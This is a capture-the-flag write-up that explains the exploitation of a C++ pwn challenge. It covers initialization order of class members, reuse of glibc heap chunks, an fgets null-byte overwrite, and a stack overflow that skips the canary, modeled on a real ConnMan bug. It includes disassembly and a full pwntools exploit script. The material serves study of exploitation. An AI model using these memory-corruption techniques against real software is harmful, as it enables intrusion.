This challenge was partly about C++ behavior and partly about a real-life vulnerability! Here’s the description:
I use whatever compiler gives me the least warnings 🤷♂️. Wait, you’re saying everyone just ignores warnings anyways? Dope. Let’s fly
We are given a docker.tar.bz2 file, which can be imported with the following command.
cat docker.tar.bz2 | docker load
After loading this and running the corresponding container, we can see the source code in static/main.cpp and the binary in challenge/warning. Taking a quick look at the main function in the provided source, we see the following:
int main(){
    // Shamelessly stolen from pedant
    int timeout = 120;
    char *timeout_str = getenv("TIMEOUT");
    if (timeout_str) {
        timeout = atoi(timeout_str);
    }
    signal(SIGALRM, timeout_func);
    alarm(timeout+2);
    signal(SIGPIPE, SIG_IGN);
    std::cout << "> " << std::flush;
    // I really hate C++
    {
        std::string s;
        std::cin >> s;
    }
    Warning* w0 = new Warning();
    if(!w0->check(1)){
        goodbye();
    }
    Warning* w1 = new Warning();
    flushcin();
    w0->get_str();
    if(!w1->check(2)){
        goodbye();
    }
    // I'll just give you the leak. Screw it
    printf("get_flag: %p\n", get_flag);
    w1->get_input();
    return 0;
}
Mostly straightforward, except for the interesting sub-scoped block:
// I really hate C++
{
    std::string s;
    std::cin >> s;
}
This is where the first bug comes from. But first, what is the check function?
bool Warning::check(uint8_t lvl){
    switch(lvl){
        case 1:
            std::cout << "Case 1: " << 0x1000 << std::endl;
            if((a+b-c) == 0x1000){
                std::cout << "Nice." << std::endl;
                return true;
            }
            return false;
        case 2:
            std::cout << "Case 2: " << -256 << std::endl;
            if(a == -256){
                std::cout << "Nicee." << std::endl;
                return true;
            }
            return false;
        default:
            return false;
    }
    return false;
}
This function performs arithmetic on members of the Warning class. How is this class defined?
class Warning{
public:
    Warning( );
    ~Warning();
    void get_str();
    void get_input();
    void jump_around(char *start, char *end, char *uncompressed, size_t uncomp_len);
    void output();
    bool check(uint8_t lvl);
protected:
    int a;
    int b;
    int c;
    char buf[0x10C];
};
And its constructor…
// I hate c++
Warning::Warning():
    c( 10 ),
    b( c+20 ),
    a( b-5 ){
}
# Fun with C++
When execution leaves the { ... } scope, the string object’s destructor runs and its heap buffer is freed. Unfortunately for the program, if a large enough string was given, this space will be used again when the call to Warning* w0 = new Warning(); is made. Nothing is overflowed here; the protected members a, b and c simply start out holding whatever bytes our string left behind. This allows us to satisfy the condition if((a+b-c) == 0x1000) in Warning::check. Based on the code, it looks like Warning’s constructor will initialize c first, and then populate b and a accordingly. However, the disassembly shows that this is not the case.
Dump of assembler code for function _ZN7WarningC2Ev:
0x0000555555556994 <+0>: endbr64
0x0000555555556998 <+4>: push rbp
0x0000555555556999 <+5>: mov rbp,rsp
0x000055555555699c <+8>: mov QWORD PTR [rbp-0x8],rdi
0x00005555555569a0 <+12>: mov rax,QWORD PTR [rbp-0x8]
0x00005555555569a4 <+16>: mov eax,DWORD PTR [rax+0x4]
0x00005555555569a7 <+19>: lea edx,[rax-0x5] ; A is first initialized with B - 0x5
0x00005555555569aa <+22>: mov rax,QWORD PTR [rbp-0x8]
0x00005555555569ae <+26>: mov DWORD PTR [rax],edx
0x00005555555569b0 <+28>: mov rax,QWORD PTR [rbp-0x8]
0x00005555555569b4 <+32>: mov eax,DWORD PTR [rax+0x8]
0x00005555555569b7 <+35>: lea edx,[rax+0x14] ; B is then initialized with C + 0x14
0x00005555555569ba <+38>: mov rax,QWORD PTR [rbp-0x8]
0x00005555555569be <+42>: mov DWORD PTR [rax+0x4],edx
0x00005555555569c1 <+45>: mov rax,QWORD PTR [rbp-0x8]
0x00005555555569c5 <+49>: mov DWORD PTR [rax+0x8],0xa ; C is then initialized with 0xa
0x00005555555569cc <+56>: nop
0x00005555555569cd <+57>: pop rbp
0x00005555555569ce <+58>: ret
# Variable initialization
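So why is A being initialized first, followed by B, then C? Non-static data members are always initialized in the order they are declared in the class, regardless of the order in which they appear in the constructor’s member initializer list. (This is the mismatch that GCC and Clang flag with -Wreorder, which fits the challenge description.) For example, consider the following two classes. In the below example, the declaration order is a,b,c.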
class Warning {
public:
    Warning( );
    ~Warning();
private:
    int a;
    int b;
    int c;
    char buf[0x10C];
};
Which will result in the following constructor.
Dump of assembler code for function _ZN8Warning3C2Ev:
0x000000000040131c <+0>: push rbp
0x000000000040131d <+1>: mov rbp,rsp
0x0000000000401320 <+4>: mov QWORD PTR [rbp-0x8],rdi
0x0000000000401324 <+8>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401328 <+12>: mov eax,DWORD PTR [rax+0x4]
0x000000000040132b <+15>: lea edx,[rax-0xa] ; A is first initialized with B - 0xa
0x000000000040132e <+18>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401332 <+22>: mov DWORD PTR [rax],edx
0x0000000000401334 <+24>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401338 <+28>: mov eax,DWORD PTR [rax+0x8]
0x000000000040133b <+31>: lea edx,[rax+0x5] ; B is then initialized with C + 0x5
0x000000000040133e <+34>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401342 <+38>: mov DWORD PTR [rax+0x4],edx
0x0000000000401345 <+41>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401349 <+45>: mov DWORD PTR [rax+0x8],0xa ; C is then initialized with 0xa
0x0000000000401350 <+52>: nop
0x0000000000401351 <+53>: pop rbp
0x0000000000401352 <+54>: ret
And in the below example the ordering is c,b,a.
class Warning {
public:
    Warning( );
    ~Warning();
private:
    int c;
    int b;
    int a;
    char buf[0x10C];
};
Produces the following constructor.
Dump of assembler code for function _ZN8Warning4C2Ev:
0x00000000004013e0 <+0>: push rbp
0x00000000004013e1 <+1>: mov rbp,rsp
0x00000000004013e4 <+4>: mov QWORD PTR [rbp-0x8],rdi
0x00000000004013e8 <+8>: mov rax,QWORD PTR [rbp-0x8]
0x00000000004013ec <+12>: mov DWORD PTR [rax],0xa ; C is first initialized with 0xa
0x00000000004013f2 <+18>: mov rax,QWORD PTR [rbp-0x8]
0x00000000004013f6 <+22>: mov eax,DWORD PTR [rax]
0x00000000004013f8 <+24>: lea edx,[rax+0x5] ; B is then initialized with C + 0x5
0x00000000004013fb <+27>: mov rax,QWORD PTR [rbp-0x8]
0x00000000004013ff <+31>: mov DWORD PTR [rax+0x4],edx
0x0000000000401402 <+34>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401406 <+38>: mov eax,DWORD PTR [rax+0x4]
0x0000000000401409 <+41>: lea edx,[rax-0xa] ; A is then initialized with B - 0xa
0x000000000040140c <+44>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401410 <+48>: mov DWORD PTR [rax+0x8],edx
0x0000000000401413 <+51>: nop
0x0000000000401414 <+52>: pop rbp
0x0000000000401415 <+53>: ret
Even with the same constructors, these will have their variables initialized in the complete opposite order! Neat.
If we can somehow force the allocation to land on memory we have already filled, we will be able to control the values that end up in the a and b members of the Warning class.
# Messing with the constructor
We can clearly see what we want to target now. We can send the following data for our new Warning object to use.
_satisfy_w0_check = b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00' + b'A' * 0x400
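As a sanity check on those first twelve bytes, here is a minimal Python sketch that models the constructor running in declaration order over recycled memory. The helper names (`to_int32`, `construct_warning`) are made up for illustration and are not part of the challenge; the constants come from the constructor shown earlier.

```python
import struct


def to_int32(value):
    """Wrap a Python int to a signed 32-bit value, like an int on x86-64."""
    return (value + 2**31) % 2**32 - 2**31


def construct_warning(stale):
    """Model Warning::Warning() over memory that still holds old bytes.

    Members are initialized in declaration order (a, b, c), so a and b are
    computed from the stale values of b and c before those are overwritten.
    """
    _stale_a, stale_b, stale_c = struct.unpack_from("<iii", stale)
    a = to_int32(stale_b - 5)    # a( b-5 ) runs first and reads stale b
    b = to_int32(stale_c + 20)   # b( c+20 ) runs second and reads stale c
    c = 10                       # c( 10 ) runs last
    return a, b, c


# The first twelve bytes of the payload from the write-up.
header = b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00'
a, b, c = construct_warning(header)
print(hex(a), hex(b), c)               # 0x7f6 0x814 10
print(to_int32(a + b - c) == 0x1000)   # True
```

The trailing b'A' * 0x400 plays no part in this arithmetic.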
But why is this extra padding needed?
# Differences between TCACHEBINS and SMALLBINS
When a chunk is freed, if its size is 0x410 or smaller, it will be released into a tcache bin (as long as that bin still has room). This is not what we want here, as when this happens, some data at the start is overwritten. This can be seen in the malloc/malloc.c source code:
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
    tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
    /* Mark this chunk as "in the tcache" so the test in _int_free will
       detect a double free. */
    e->key = tcache_key;
    e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
    tcache->entries[tc_idx] = e;
    ++(tcache->counts[tc_idx]);
}
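Because this is not what we want, the string’s buffer needs to end up in a chunk larger than 0x410 bytes. This is why we pad the initial _satisfy_w0_check with 0x400 bytes of A. A chunk that large never enters the tcache when it is freed, so tcache_put never runs on it. Strictly speaking it is also too large for a smallbin (those stop below 0x400); free either merges it into the adjacent top chunk or queues it in the unsorted bin. Judging by the heap dumps below, the start of our data survives the free, and the next call to malloc returns the same memory without overwriting it.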
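The size threshold can be sketched in a few lines of Python. This assumes 64-bit glibc with default tunables (8-byte size field, 16-byte alignment, 64 tcache bins); the function names are illustrative, not glibc’s, and the per-bin limit of 7 entries is ignored.

```python
SIZE_SZ = 8                # bytes used by the chunk's size field (x86-64)
MALLOC_ALIGNMENT = 16      # chunk sizes are multiples of 16 (x86-64)
MIN_CHUNK_SIZE = 0x20      # smallest chunk malloc hands out
TCACHE_MAX_CHUNK = 0x410   # largest chunk size covered by the default tcache bins


def chunk_size(request):
    """Round a malloc request up to the chunk size glibc would use."""
    size = (request + SIZE_SZ + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1)
    return max(size, MIN_CHUNK_SIZE)


def fits_tcache(request):
    """True if a freed chunk for this request is small enough for the tcache."""
    return chunk_size(request) <= TCACHE_MAX_CHUNK


for request in (0x118, 1032, 1033, 12 + 0x400):
    print(hex(request), hex(chunk_size(request)), fits_tcache(request))
```

Note that the buffer std::string actually allocates depends on its growth policy, so the last request size is only a lower bound for the real chunk.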
After satisfying the w0->check(), we have yet another check to pass, in the new Warning object’s call to check. This time we need to satisfy a==-256. With what we know about this object’s constructor, this should be rather easy to pass.
We pad our initial value with an extra 280 bytes and simply append four \xff’s to the end. The w1 chunk starts 0x120 bytes after the w0 chunk (the 0x118-byte Warning object plus heap metadata), and w1->b sits one int further in, at offset 0x124 = 292 from the start of our input; subtracting the 12 bytes already used for w0 leaves 280 bytes of padding. The X’s are simply more padding to keep the chunk too large for the tcache. We are not overwriting w1->a initially, but w1->b, and taking advantage of the constructor to cause w1->a to be initialized to w1->b minus 5.
_satisfy_both_checks = b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00' + (b'A' * 280) + b'\xff' * 4
_satisfy_both_checks += b'X' * 0x300
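The offset arithmetic can be checked with a short Python sketch. It assumes w1 is allocated exactly 0x120 bytes after w0 (the distance between the two chunk addresses in the dumps in this write-up) and that Warning has no padding between its members; the variable names are illustrative.

```python
import struct

WARNING_SIZE = 3 * 4 + 0x10C     # three ints plus buf: 0x118 bytes
CHUNK_STRIDE = 0x120             # assumed distance from w0 to w1
W1_B_OFFSET = CHUNK_STRIDE + 4   # skip w1->a to reach w1->b

header = b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00'
padding_len = W1_B_OFFSET - len(header)

payload = header + b'A' * padding_len + b'\xff' * 4 + b'X' * 0x300

# Stale values the w1 constructor will read: b as a signed int, c as raw bits.
stale_b, stale_c = struct.unpack_from("<iI", payload, W1_B_OFFSET)

# Constructor in declaration order: a = b - 5, b = c + 20, c = 10.
w1_head = struct.pack("<iIi", stale_b - 5, stale_c + 20, 10)
print(padding_len, w1_head.hex(" "))
```

The twelve bytes printed should match the start of the w1 dump: fa ff ff ff, 6c 58 58 58, 0a 00 00 00.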
After sending this data, here is what the top of the w1 object looks like.
Chunk(addr=0x556742cc1bc0, size=0x120, flags=PREV_INUSE)
[0x0000556742cc1bc0 fa ff ff ff 6c 58 58 58 0a 00 00 00 58 58 58 58 ....lXXX....XXXX]
The w0 object at this point is:
Chunk(addr=0x556742cc1aa0, size=0x120, flags=PREV_INUSE)
[0x0000556742cc1aa0 f6 07 00 00 14 08 00 00 0a 00 00 00 41 41 41 41 ............AAAA]
Finally, we send exactly 0x114 bytes to w0->get_str(). w0->buf starts 12 bytes into the object, at 0x0000556742cc1aac, and some quick math shows that 0x0000556742cc1aac+0x114 is exactly the start of our w1 object. Reading the fgets man page…
fgets() reads in at most one less than size characters from stream and stores them into the buffer pointed to by s. Reading stops after an EOF or a newline. If a newline is read, it is stored into the buffer. A terminating null byte (’\0’) is stored after the last character in the buffer.
So the terminating null byte is written over the lowest byte of w1->a, turning 0xfffffffa (-6) into 0xffffff00 (-256). Our final w1 object after the read will look like:
Chunk(addr=0x556742cc1bc0, size=0x4242424242424240, flags=! PREV_INUSE|IS_MMAPPED)
[0x556742cc1bc0 00 ff ff ff 6c 58 58 58 0a 00 00 00 58 58 58 58 ....lXXX....XXXX]
And we pass through all the checks! After which, the author was nice enough to give us an infoleak for a nice little ret2win.
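The single null byte from fgets can be checked with a few lines of Python. The addresses are taken from the heap dumps in this write-up; the 12-byte offset of buf assumes the three ints are laid out without padding.

```python
import struct

W0_ADDR = 0x556742cc1aa0   # w0 object, from the dump
W1_ADDR = 0x556742cc1bc0   # w1 object, from the dump
BUF_OFFSET = 12            # buf follows the three 4-byte ints (assumed layout)

buf_addr = W0_ADDR + BUF_OFFSET
null_addr = buf_addr + 0x114   # fgets stores '\0' right after the 0x114 characters

a_before = bytes.fromhex("faffffff")   # w1->a after the constructor: -6
a_after = b"\x00" + a_before[1:]       # lowest byte replaced by the terminator
value = struct.unpack("<i", a_after)[0]

print(hex(null_addr), value)
```

The computed address equals the start of w1, and the patched bytes decode to -256, which is what check(2) compares against.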
# Getting jumpy
Next, w1->get_input(); is called. The function is as follows:
void Warning::get_input(){
    struct {
        char buf1[1025];
        char buf2[257];
    } input_bufs = {0};
    flushcin();
    std::cout << "> ";
    if(!fgets(input_bufs.buf1, sizeof(input_bufs.buf1), stdin)){
        exit(-1);
    }
    // Do you like TBONE steak?
    jump_around(input_bufs.buf1,
                input_bufs.buf1 + 1024,
                input_bufs.buf2,
                sizeof(input_bufs.buf2));
    printf("Jump! Jump! Jump! Jump!\n");
}
Not much going on here; on to jump_around:
// Pack it up, pack it in, let me begin
void Warning::jump_around(char *start,
                          char *end,
                          char *uncompressed,
                          size_t uncomp_len){
    // wow this whole function seems so contrived
    // it makes literally no sense
    char *uptr = uncompressed;
    char *bptr = start;
    // The bug in this function would never b a bug in real life
    while(bptr < end && uptr < (uncompressed + uncomp_len)){
        size_t ulen;
        size_t pos = 0;
        char name[63] = {0};
#if !USERINPUT
        if (!convert_label(start, end, ptr, name, NS_MAXLABEL,
                           &pos, &comp_pos))
            goto out;
        /*
         * Copy the uncompressed resource record, type, class and \0 to
         * tmp buffer.
         */
#else
        // Give me your con man name
        std::cout << "> ";
        fgets(name, sizeof(name), stdin);
        ulen = strnlen(name, sizeof(name));
#endif
        // Error checking, thats good
        if((uptr - uncompressed) > uncomp_len){
            return;
        }
        strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
        // C++ but pointer math? :thinking_face:
        uptr += ulen;
        *uptr++ = '\0';
        bptr += pos;
        memcpy(uptr, bptr, 10);
        bptr += 10;
        uptr += 10;
    }
    return;
}
Alright, there’s a lot more going on here. The bug arises from the fact that there is no bounds check before the memcpy, and that uptr is advanced by the full ulen even when strncpy was only allowed to copy fewer bytes. In some situations this moves uptr past the end of the buffer, so we can write outside it. Usually, with stack canaries, this has limited impact; in this case, however, we can carefully craft our input to “jump” over the canary. Note the uptr += ulen; line that causes this.
Sending the first three buffers at max length (62 bytes each), and a final buffer with a length of 0x33, will let us do this. When we process the final buffer, strncpy only copies a total of uncomp_len - (uptr - uncompressed) bytes, which stops at the end of buf2, but uptr still advances by the full strnlen() result. This is where the issue comes from: uptr skips the bytes in between, and this lets us “jump” over the stack cookie. By then bptr has advanced 30 bytes into our first input, so we send 30 padding bytes followed by our desired return address. With this, we redirect code execution wherever we want. Here is what this looks like in code.
_get = 30
p.send(b'A' * _get + p64(_offset) + b'A' * (0x400 - _get))  # Padding before overwriting RIP
print(p.recv(timeout=1))
buf = b'\x01' * 0x3d + b'\x02'  # Fill up the buffer
buf += buf * 2
buf += b'\xaa' * (0x3d-10) + b'\x00'  # This won't finish a full copy, but the length is important
p.sendline(buf)
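To see where the final memcpy lands, the pointer arithmetic of jump_around can be replayed in Python without touching any memory. This is a rough model, assuming the four names arrive with lengths 62, 62, 62 and 0x33 as described above and that pos stays 0; `simulate_jump_around` and the field names are invented for this sketch.

```python
def simulate_jump_around(name_lengths, uncomp_len=257, in_len=1024):
    """Replay jump_around's offsets for a list of strnlen() results.

    Offsets are relative to the start of buf2 (uptr) and buf1 (bptr).
    """
    uptr = 0
    bptr = 0
    trace = []
    for ulen in name_lengths:
        if not (bptr < in_len and uptr < uncomp_len):
            break                     # the while-loop condition
        if uptr > uncomp_len:
            break                     # the "error checking" early return
        copy_limit = uncomp_len - uptr    # strncpy never writes past buf2
        uptr += ulen                      # but uptr moves by the full ulen
        null_at = uptr
        uptr += 1
        trace.append({
            "strncpy_limit": copy_limit,
            "null_at": null_at,
            "memcpy_dst": uptr,   # 10 bytes are written starting here
            "memcpy_src": bptr,   # and read from this offset in buf1
        })
        bptr += 10
        uptr += 10
    return trace


steps = simulate_jump_around([62, 62, 62, 0x33])
for step in steps:
    print(step)
```

In the last step strncpy is limited to 38 bytes, while the memcpy destination is offset 271, past the end of the 257-byte buf2, and its source is offset 30 of the first input. The skipped bytes in between are left untouched; whether they hold the canary depends on the stack layout the compiler chose.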
# Putting it all together
With all that in mind, here is what the final exploit looks like.
from pwn import *
from binascii import hexlify, unhexlify
context.terminal = ['tmux', 'splitw', '-h']
_ticket = "TICKET"
g = cyclic_gen()
_remote = 0
if _remote:
    p = remote("warning.quals2023-kah5Aiv9.satellitesabove.me",5300)
    p.sendline(_ticket.encode())
else:
    p = process("./warning")
print(p.recvuntil(b'> '))
# Stale values for w0 (check 1), padding up to w1->b, then padding to stay out of the tcache
p.sendline(b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00' + b'A' * (280) + b'\xff\xff\xff\xff' +b'X' * 0x300)
print(p.recvline())
print(p.recvline())
print(p.recvuntil(b'> '))
print("sending first payload")
# fgets' terminating null byte lands on the lowest byte of w1->a (check 2)
p.sendline(b"B"*0x114)
p.recvline()
p.recvline()
leak = p.recvline()
print(leak)
_offset = int(leak.split(b' ')[1][:-1],16)
print("Got leaked function: " + hex(_offset))
_get = 30
p.send(b'A' * _get + p64(_offset) + b'A' * (0x400 - _get))
print(p.recv(timeout=1))
buf = b'\x01' *0x3d + b'\x02'
buf += buf * 2
buf += b'\xaa' * (0x3d-10) + b'\x00'
p.sendline(buf)
print(p.recvuntil(b'> '))
print(p.recvline())
print(p.recvline())
Run it, and get the flag.
# Misc
The jump_around function was an actual vulnerable function in the ConnMan (v1.37) network manager that was used by the Tesla Model 3. The bug was leveraged by the team at Comsecuris to exploit the Model 3 at the 2020 Pwn2Own competition! Super cool stuff.
The version of glibc that was used in this challenge is 2.35.